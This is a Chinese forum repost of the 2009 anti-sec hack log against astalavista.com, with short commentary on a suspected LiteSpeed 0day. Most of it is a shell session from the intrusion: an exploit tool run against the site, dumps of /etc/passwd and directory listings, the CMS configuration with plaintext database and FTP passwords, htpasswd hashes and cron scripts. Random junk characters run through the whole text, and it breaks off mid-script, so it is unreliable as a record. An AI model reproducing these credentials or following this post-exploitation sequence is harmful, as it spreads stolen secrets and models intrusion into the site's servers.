里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。$ ^1 N! Y' h3 x/ \1 w& D6 o
# Q1 j1 ~1 I |4 s[root@front3 ~]# curl -I litespeedtech.com/ S2 c7 D6 i- B: ]: {) B1 k& I6 I
HTTP/1.1 200 OK. A3 a. ^7 a$ {# n6 u
Date: Fri, 05 Jun 2009 22:54:51 GMT
( D$ x% t9 X$ _' |; j" T5 ZServer: LiteSpeed
, q& D# i" G# @; }; N+ x9 f/ x( f' S G2 B% ?6 ?
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-0 A o6 d& r& D1 d# u
2 s& U) D c- d; R有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。 L" `3 D6 r. R% F! l
9 |3 L2 p4 a- [# u; p; N$ f3 V3 R8 R" ^8 y# F- I j
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
& P! {5 H( x* Y' e" y6 F/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
" g9 _) v+ Y+ X' V. u3 X/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
/ c" Q7 ?" ^7 m, s\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /8 S3 {- X! a h' V* L- E
\/ \/ \/ \/ \/ \/ \/% X) j" E4 E# t$ z. y
The Hacking & Security Community
2 k1 h+ v6 y+ x# O- m! {# M[+] Founded in 1997 by a hacker computer enthusiast! b& r' m! N1 B! C( J
[-] Exposed in 2009 by anti-sec group
" T- t- |! z7 a% x( E7 f y
8 V& y; z7 ]) f fFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
( @: A' E3 _9 o$ U+ q5 `, [2 ~>> 03. Who’s behind the site?
G* v: X! B/ m8 L1 q k! k>>
6 h1 W q" o) q: c/ J>> A team of security and IT professionals, and a countless number of contributors from all over the world.
5 i9 w1 O6 T! L, a/ |/ \4 R* `( k
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?# H0 x. b2 i2 q4 g3 F/ q, s0 O
>>
d' J$ ?: m3 L' D>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and1 h2 a$ q' _2 f- \
military institutions.
8 R) X; T. D7 ~8 d( B>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.# u2 C1 v* T/ v6 ~+ t; b
9 K+ Z9 h/ E: Y% L7 b+ Y" o; ~
Why has Astalavista been targeted?+ N' i2 _0 d% c. i: T0 | y
/ _: _; C) |7 _/ t2 qOther than the fact that they are not doing any of this for the “community” but$ |+ Q; _* r" O) j: ~( K. I$ a
for the money, they spread exploits for kids, claim to be a security community0 O8 ~; R/ e6 s& o1 P" _
(with no real sense of security on their own servers), and they charge you $6.66# ]$ |1 v9 V8 Q! u2 p
per months to access a dead forum with a directory filled with public releases
" p& G$ X% y1 e- X4 G# Oand outdated / broken services.
- d4 Q' H0 S/ m+ o3 }" X3 ]4 l4 O" P, d8 z j
We wanted to see how good that “team of security and IT professionals” really is.
$ H5 P3 s* O; h( W# ^3 z/ I% J8 L ^( m
Let’s begin.
: e) I' V& r$ j. d
$ G4 t3 A6 G0 t1 h2 }8 Banti-sec:~# ./g0tshell astalavista.com -p 809 `0 T+ C/ Z5 j/ l# b
[+] Connecting to astalavista.com:80
' h) S1 s$ @2 g8 P4 g: _[+] Grabbing banner…: X9 w$ b3 R0 x! @+ p2 `6 m6 A/ b- [
LiteSpeed1 B2 x' o7 K3 t: v: b2 ^5 r
[+] Injecting shellcode…; } B f0 W! U; v! W
[-] Wait for it+ r, [4 L& S( g
) ?8 h- l' s6 u4 Q' ^1 S/ I[~] We g0tshell
3 q; v/ w9 ^0 h! Ouname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. J- x* ^4 P, b2 O$ I, c
ID: uid=100(apache) gid=500(apache) groups=500(apache)
2 s$ {) S* E( u) Y! J
7 C( L0 v3 l4 }' d4 Bsh-3.2$ cat /etc/passwd
! B1 U) x# N- u1 F* P, X, N' Croot:x:0:0:root:/root:/bin/bash, @+ i2 T9 D# T( E5 z
bin:x:1:1:bin:/bin:/sbin/nologin9 s$ I. W2 x3 Y+ _) ~3 V2 d% C$ v
daemon:x:2:2:daemon:/sbin:/sbin/nologin
5 V* I3 `0 w% k5 Tadm:x:3:4:adm:/var/adm:/sbin/nologin; }, D- H$ ~2 B) x
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
; _1 \( [6 H! k4 P7 L7 {) V9 rsync:x:5:0:sync:/sbin:/bin/sync
" O& w1 ?$ `1 h' {- _, eshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
s6 y U8 i5 S! e Fhalt:x:7:0:halt:/sbin:/sbin/halt
; y2 W8 |' ^7 Y" B' k. o, T lmail:x:8:12:mail:/var/spool/mail:/sbin/nologin" ?) ^( E/ U7 b* \0 z4 X
news:x:9:13:news:/etc/news:
$ P/ k0 d' t& z2 T3 xuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin% l! h0 v+ }" T1 R% S! m$ U, F
operator:x:11:0 perator:/root:/sbin/nologin7 X4 a2 K% }3 l0 F
games:x:12:100:games:/usr/games:/sbin/nologin5 D7 @; g) t& ]7 e) H
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
) V% J4 @1 ~- `9 l% W: Z: Sftp:x:14:50:FTP User:/var/ftp:/sbin/nologin2 D- b: ] f2 N3 }: m8 t" h1 G
nobody:x:99:99:Nobody:/:/sbin/nologin
# ]' l* h7 T; s* ^' Y1 Rrpm:x:37:37::/var/lib/rpm:/sbin/nologin0 v" N+ R% x/ Y3 A( i/ f" ~4 X: y
dbus:x:81:81:System message bus:/:/sbin/nologin+ A' ~# j7 f) @+ M, ]. G
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin9 u9 t6 y, ^& D \9 F
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin( X0 y; b9 f4 Q5 Q H$ P
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
1 Z, q$ p* P2 S: bvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
2 |( m% ~0 P' Q: B( ihaldaemon:x:68:68:HAL daemon:/:/sbin/nologin2 _5 G! Z( K0 l. S4 K2 \" n
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin: s' ]. j: `% \% F3 _# a# J7 e) r
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin1 r9 E% H) N5 M( r$ i
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin& x. l! S% m$ N2 b# u9 t
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
M# z6 @3 I9 Xpcap:x:77:77::/var/arpwatch:/sbin/nologin
+ T: h* F3 f: r4 R" M0 G' Qnamed:x:25:25:Named:/var/named:/sbin/nologin# W; L0 Z# e8 Z: c! u: \
apache:x:100:500::/var/www:/bin/false
7 z- ^' V. G$ f% Zdiradmin:x:101:101::/usr/local/directadmin:/bin/bash! w# L1 ]8 j5 f& Q
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
6 F. E0 ]( F6 K0 X8 b! H( Swebapps:x:500:501::/var/www/html:/bin/bash# b3 c( ^/ o3 D. y. F" G
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash1 z$ b8 Q& n1 M) V$ S9 F
admin:x:501:502::/home/admin:/bin/bash
$ K! p( Y- Q3 [% o1 a- {/ H$ ajon:x:502:503::/home/jon:/bin/bash
( x) a0 X5 t0 ^7 Lcom:x:503:504::/home/com:/bin/bash
3 l. f0 J& ]. r: X7 Y/ dntp:x:38:38::/etc/ntp:/sbin/nologin. w" ?: v9 e8 t' u8 K
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
9 m! H$ H# B5 l* D0 d! e; y7 X& d4 j# Zastanet:x:504:505::/home/astanet:/bin/bash9 l* T: s$ e9 g5 N- g3 } E
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
( F5 u) K: N( r. |+ xavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
! w% a7 O4 b+ f* @8 v( M4 n, w3 H. h
sh-3.2$ cat /etc/hosts- v( ^7 I6 m' h# U4 O
# Do not remove the following line, or various programs5 f0 }9 f+ ?/ T% Q! \5 W1 e( ]* H3 u
# that require network functionality will fail.
! n' G" |+ y+ w3 j6 n/ A; y: _3 X127.0.0.1 localhost.localdomain localhost% D/ o/ a6 m6 V( n0 G
::1 localhost6.localdomain6 localhost6
: V" M; S+ q# g) t/ o+ s8 _80.74.154.172 asta1.astalavistaserver.com
& y: W2 M9 s q& X
4 H i' P; _- W9 O# Ksh-3.2$ pwd7 n) f: S3 ^( X0 l6 w
/home/com/public_html
* |% s( ?( N: K: t+ {) W- Y% |# ~' i& \6 G- M
sh-3.2$ ls -la: Y7 T% U( s% H: S) b+ m" @
total 184600 q2 H( j0 @$ J. h
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
! x$ R/ V9 k9 c% p$ s2 Wdrwx–x–x 11 com com 4096 Jun 25 2008 ..
/ W7 l% l& D. l. Fdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin E/ J* K2 U; I+ `6 v% S% r
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache2 w1 N& k: l& D# E3 C
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin/ ~) e: c, H( i3 D
drwxrwxrwx 2 com com 4096 May 19 00:50 config
6 S3 K3 Z- i9 k; Sdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
$ v8 F# S+ r" @: a8 s, @; |drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules) v; g* |6 f) C3 w
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing) z0 r+ a/ h, F' |! z" x+ W$ a/ Z
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
6 t1 O) i3 x _drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
, m9 ?- b9 H( s0 H3 e-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
, _; B2 ^2 b' `& k: a; ydrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd& r- y1 N, C$ U4 @1 B6 l
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
9 p% A) K$ |) N6 U% ^-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
) d* Y) v! \ F" gdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed4 Z& Q3 N, J0 Q C
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess& c8 Y) }- n0 c, Y: f: B4 c
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
7 }( {9 `9 J+ J$ w& \ B-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
" L( u! v+ I# y4 F9 rdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool/ r8 T/ y7 g( j( R( ^" i
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images% n9 ]# q y- f
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
% o( Y X% s9 w2 y+ _- C Ldrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer6 Y$ C8 Q8 {! c$ G5 i" m F8 b: c
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang3 i5 W; A0 S: _! g- K# O! V
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib( \/ i- H$ M8 G& J0 x) W. _
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
9 | O+ y4 R8 Z9 gdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications2 g2 h* t+ K6 _
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
. k2 p2 K4 j9 [/ D( h! p+ @8 Adrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin; l! [+ P+ T! i/ M- p
drwxrwxr-x 22 com com 4096 May 28 17:06 _new {* q. r5 W9 v) q
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old8 ^; X5 I, @& b
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
1 q/ T* A7 F3 o4 p- Rdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy A5 b* C0 v# x1 b3 F0 @
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt* W" j( n3 a2 l# Y- O
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml, _& W$ }1 O7 w+ C2 l
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
: B V8 Q# c) ]7 r [drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes: [" V' Y" y5 [& b5 b
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp' t5 U* }0 j3 B u5 [) ~3 C
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
% q2 M; M: X. y# O3 e6 }, o3 H
8 f& W# D. b- L! v& t6 {/ y2 n* ash-3.2$ head -20 index.php
' A% D7 ?: ^" t& }<?php
( o8 x# j& w% Q4 S
. |7 R* w* V0 v2 Q1 Q& A/**
9 m% {0 X2 Q1 V4 N- S! E* The main page for the CMS" [% I" }; Z) n# \9 f4 {. D
* @copyright CONTREXX CMS - COMVATION AG
' U4 g) _. }# Q8 E; d5 i* @author Comvation Development Team
. r- `! Y' F, d7 R% r, q5 j* @version v1.0.9.10.1 stable/ S% z' D0 U2 Q1 t+ |* |$ X0 H
* @package contrexx
2 E" l* [; y: P1 A* @subpackage core. B4 |+ j9 |: g* \3 d
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
* K( v2 ?% O, `2 L! g4 T) u* @since v0.0.0.09 z3 y; X; ^* s9 x* k# U
* @todo Capitalize all class names in project
' b4 {* o% D' U+ c! Q* @uses /config/configuration.php
9 @+ N T7 T! W3 h w* c/ I( `* @uses /config/settings.php- M/ y' Z9 y9 y
* @uses /config/version.php! l) {7 v% ?; p8 M; G3 @ I
* @uses /core/API.php8 J+ U* M9 L9 ^4 h+ [+ m
* @uses /core_modules/cache/index.class.php/ N# |7 ~* E" D+ O) t5 I
* @uses /core/error.class.php2 A( i; b9 U5 @1 {+ }- q
* @uses /core_modules/banner/index.class.php9 R/ D0 n" C2 L' W" d
* @uses /core_modules/contact/index.class.php
8 R1 L$ d* |+ u% `. O& P
8 M5 W g m: M8 i, Ssh-3.2$ cd config/
0 X# x0 q4 l) v, x, ~% M0 [! ` _) m0 Nsh-3.2$ ls -la, C8 W ^# L9 a
total 328 c5 G: O7 m6 M n' y8 s
drwxrwxrwx 2 com com 4096 May 19 00:50 .
5 b6 y4 c% u% @. a9 }8 G9 j# K5 n4 B' edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..' X8 Z) s. \+ g9 T6 B- T+ q
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
6 B- {' V0 Q/ c' r-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
2 w6 x7 n+ [( c8 {& X& z-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
. U% O+ R! t; F+ }+ J-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
7 r' U w& d- b1 ~: I; r( b
, X1 y, N, V) ~9 {% [$ ?, [- y7 xsh-3.2$ cat configuration.php4 v: j: O* f" |8 w4 P+ x
[snip]
% C( e4 s' U& }. h v: i$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost' w: Q% R% c# n+ I; S! b/ H/ T+ Z
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name0 N0 M& k7 {; l
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
. ?# m4 f+ j5 H9 p$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
) L4 l) }/ \6 q, v* ~$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 b: @' R1 \/ H" c! q2 e) x: {
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)0 U q4 l& E2 B/ g
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
6 T$ m9 T. Y- f5 Q$ N4 R7 ?3 F[snip]
$ ^8 Z* ~, j' y% z$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
; F4 Z' G# H9 d, p ~. g3 g$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode, u: d4 H$ f# N$ U" y9 l. P9 D! T5 p
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost$ Y0 u/ ?$ G4 R% ^5 E8 S
$_FTPCONFIG['port'] = 21; // Ftp remote port9 ~4 h+ K q) I
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username) Z1 l& ]& o% q ]9 P
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password* K# o1 n# e/ q2 c; ]* c6 }$ @3 O3 Y
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms& ^/ l3 Q5 z. m2 \3 E+ D7 }- p: F
. x3 J# _& t% C, {/ h* R
sh-3.2$ cd ..
2 T! U7 @- g1 a5 w3 f ^sh-3.2$ cd dvd/
5 q9 G& T9 `' D/ F# g1 a9 C; D$ [sh-3.2$ ls -la
6 U& V5 W; L* H8 y6 p. p' F& s1 btotal 2913780 O' s4 M+ @! m. i. T$ i' a
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
; Y% k' Z: Z* M, L5 x# N' K9 ~8 g+ fdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# }0 Y: u0 L A# w; K; i5 m. z: H7 c-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
9 U! k0 H) e @" O' @2 O% h) P-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar9 V3 w( k: y t0 H( O% f" M
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
1 k) o. A+ a4 n-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
, e8 z3 [/ P% i$ \/ l
! h% U6 D/ v9 M% x9 t& Ush-3.2$ cat .htaccess3 `1 J' [; M) D X
authType Basic) m: H8 ~8 ]; P; {5 I" R6 t
authName DVD
x7 S* T+ e A+ T; L/ s1 Z, RauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
5 P0 _; Z& P! x; ?0 W2 ` l3 T# hrequire valid-user- X: [+ f" e7 Q1 ~
/ T9 m j+ S3 J' z4 n7 |sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd3 ^6 \( I" w1 J2 I- G( J6 U
DVDdownload:CRD8cuY6.MPT65 k9 l2 B: J0 H" j3 E; o2 g4 h
DVDdownload2:CR8a36.wluFMg0 M& q$ {# _; o$ ~
7 M; a) I7 c# a$ s9 ^
sh-3.2$ cat test.php
- D/ W5 d. b7 E<?php
. @8 H& x$ W; m/ U$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;" d4 Y @9 |2 e( H, f0 P" F
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));- m( A# Y8 L" K% Y% T3 c6 V" i
echo $url;! K+ p( v, Z$ B! R
?>
$ Q! V( N% Q6 \' f- I5 `. F( d9 j& x' u
sh-3.2$ cd modifications// H% S7 E! \4 F. L
sh-3.2$ ls -la m2 t! e- _3 M. H# ^* U( C1 v: ~: I
total 32
- l3 X0 X) W- M# n( r+ o5 l( Ydrwxr-xr-x 8 com com 4096 May 11 12:48 .
+ g: F4 G: a* W. U. U; s0 S: Cdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 u: v* }; w% Q% w) Gdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng) D' a* S# p9 `6 J3 Q m% p# \( k
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
$ i5 M/ x- w) _# idrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools8 m/ w% W; ]- [- S0 q. m8 N$ a; @
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc4 m0 ]1 n+ e* w% L9 X5 W
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
9 c% M" u0 J) q; }) R( gdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp' I, a3 d3 o+ q$ K, ]% w, R
/ N& F2 z! x$ T% d0 u: r" |$ F
sh-3.2$ ls -R# R3 r( @$ A1 Z6 H8 {) T7 L
.:9 V& I+ M3 s% U+ e6 Y. ?
com_avtng cronjobs onlinetools pjirc search _tmp& k+ _6 D8 P! Y9 ?! g. e8 |/ o
; U; B3 D3 q7 X) F. [./com_avtng:
( e' n3 J& J3 M& O" U2 C) V( javtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
+ t6 U- L2 }# l5 P; J! \8 i0 i- ?) e3 C& R8 e. ~% B6 W0 t
./com_avtng/scripts:4 `0 Q5 h% ?3 i( y' s- H, B
popunder.js
1 n/ F) A' ~ a$ q) x0 m1 v9 [* [' C4 Q N/ M6 @
./cronjobs:
. C9 M3 Y4 d$ [- O8 Qexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp. g6 T; y6 }, `7 c
! G0 P. V1 X# I& i, Y
./cronjobs/tmp:
( S- M' S6 M M- j9 `6 Y e( scontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv' H( L& n4 g) @* J7 J
, {+ W/ B3 q- Y4 K9 k) e$ m
./onlinetools:
9 |1 `* P% H3 F( n" ^index.php/ W! h0 t6 ?' W7 s* Q; Y& s
1 `, w4 G' R0 D% D: Y
./pjirc:) I0 f3 s: @) F9 o' c* P
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
4 ^, U+ D7 \ K- @1 ^) V( FAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
3 H, t) I1 P1 a) E: s$ Lbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd# q' ~& z1 a& q4 d7 t2 p
4 b/ l1 X8 j" |% F% v" J' k/ X/ L./pjirc/img:
! Q- s6 v8 t4 w2 H- Qange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
+ C% O1 K: ]/ d/ F" Y, \arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif ( Y2 r' i8 U/ g4 Q% H) e- d
verre-eau.gif% Z6 s8 f0 r- h# A& L
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif " {& S, e4 j( u2 N* p
verre-vin.gif7 s0 r/ K( s; E" u
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif8 o" K1 s0 _; H
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif! p' L/ t* o" k" E$ o' B6 j
# S; V- u* h5 H
./pjirc/snd:
$ c' U+ @* J/ j+ X, s Vbell2.au ding.au
8 p/ l: _0 r- e6 G9 O% Y9 p' N! p6 L# U
./search:
9 @/ q( S! r4 [" ksearchEngines.php search.php
' v+ U6 b: a3 I! a
6 p; I7 P' L6 i2 S& E; }* M./_tmp:
: _1 ?8 R# Y' e4 s8 C, idefaultPorts.php defaultPorts.txt
( l) A. `! q3 u7 T2 ]2 w$ I8 d( P$ h* }$ A
sh-3.2$ cd cronjobs/
7 l$ L* r y4 | M$ v8 Ysh-3.2$ cat exploits.php
5 _% j, N/ C5 f( `3 o[snip]
6 [4 C3 a( o; U7 S$categories = array();
4 D7 V" Z" a0 w) N" \ X% w! q/ n$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
- l4 a4 m5 H: y# S" N4 n9 e2 \8 z$expolits = file($milw0rmFile);( I* ]1 Z% P* B; x3 n0 Q
$comExploits = array();
- e6 ]3 b/ C# d2 h5 {[snip]
. W, n1 [% \; C// manage data$ }. w. C# j+ v( l: D' C
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ a9 ?, B4 p4 `8 Y( z, p! c4 Y9 i) r/ M, [
// get path and title
7 J U6 Z3 _( Q+ S9 j+ a $expolits[$x] = trim($expolits[$x]);( H2 p% U; `, h' w% b6 t: p$ r5 W
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));7 e/ B5 a m; h {) w8 C
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);5 _ B, @& m9 d( [" v+ Y: H
( Y8 z H3 w9 A# @+ s K // check if file exists7 e4 C2 a- Z9 \) n' w& S- W
if (file_exists($path)) {% I s, S3 m3 c& h! w, D
. H. a# I6 _) P: v) c. j $text = file_get_contents($path);# I' E+ {+ \) z7 X1 M9 e
" {! m: ?5 p' p3 [8 Y" ` // get content and date$ {( O# T( g# z2 h0 F
//$text = htmlspecialchars($text, ENT_QUOTES);
! }0 O6 ~+ z1 } $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
$ N1 G8 h, w8 N B' S- {% b0 ` if ($tmptext != ”) {
+ X6 v! f w2 ? $text = $tmptext;+ j+ J. {) N5 w, y# X& K3 A+ p% K
} else {& E2 Q0 w4 m- W$ A9 z6 [, F
$text = addslashes(htmlentities($text, ENT_QUOTES));
8 y" H0 T* n0 G9 M$ p }
8 j7 g2 n F& O, Q0 h6 M $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));: o2 m V- I7 M; B c% l# @
$tmp = explode('-', $date);
; u, z' F( b0 n $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));1 d! D( e* E' }6 g
$cat = getCategory ($path);! Y; Y" |+ a2 {: y! A: Q ]
$ext = pathinfo(basename($path));& {+ A7 t. O. m0 R
$ext = $ext['extension'];! T, l% C) [7 ?1 v
$qStr = ”' N$ b1 I6 X ~' R& E, q( b
SELECT `id`" T+ ~5 s% l5 d) F
FROM `contrexx_module_exploits`" C$ \; W; v! n& r+ S
WHERE `title` = ‘” . $title . “‘
' x) k4 U2 R! Y+ E$ s/ V) D- Q/ x" H AND `date` = ‘” . $date . “‘/ |- t; w( E$ x$ v$ l
“;/ j4 Z. s0 z# O% _6 z' t# M
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;2 p, C- {' ?. N0 L. F: l# k5 e
$q = $_objDB->query($qStr);7 c+ F2 E% w1 S- Y
: M0 _; m2 V6 k% e6 M if ($q->numRows() == 0) {; n3 x% y; J! \
0 k- S7 }4 \' f0 X
// prepare array
2 h |2 Y3 `, [ P $comExploits[$x]['date'] = $date;' F" C( k) p% G+ x
$comExploits[$x]['title'] = $title;
& `3 N8 m2 q% y9 Y% o4 t, W $comExploits[$x]['author'] = ‘milw0rm’;8 [( \- t: M3 V/ V; E6 r2 b: J9 _. c
$comExploits[$x]['text'] = $text;
. R) g- F$ {2 W. p0 @ $comExploits[$x]['source'] = $ext;* |; I" @' F' a0 l
$comExploits[$x]['url1'] = ”;
: J5 H [9 J- G4 r9 V $comExploits[$x]['url2'] = ”;
; j# I Z; z7 @' }! C/ p1 a! S/ p: W $comExploits[$x]['catid'] = $cat;
# \/ H5 Y' X+ O1 t9 S, q $comExploits[$x]['lang'] = ‘2′;
; B( z" P% |& M9 k6 U7 u5 Y" T $comExploits[$x]['userid'] = ‘12′;9 R3 Q, z+ O2 @2 B* d7 g5 ]( U% s
$comExploits[$x]['startdate'] = ‘0000-00-00′;: z8 N0 c6 H/ A! i0 i7 l
$comExploits[$x]['enddate'] = ‘0000-00-00′;" d! Y5 ?8 o" n T+ U! u2 L
$comExploits[$x]['status'] = ‘1′;
6 E, U, }' c( G2 y3 q2 q) ~ $comExploits[$x]['changelog'] = $date;
1 _' x2 U$ C& p- O2 `( d' V2 ?) G B- [9 f
}
. T/ R: T/ w0 O; F7 p[snip]8 R* z6 e: b" d: V, \" k4 C
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?># U7 T4 u" o6 l7 {7 u$ W' W
<rss version=”2.0″>
$ H" o! t& e/ g <channel>
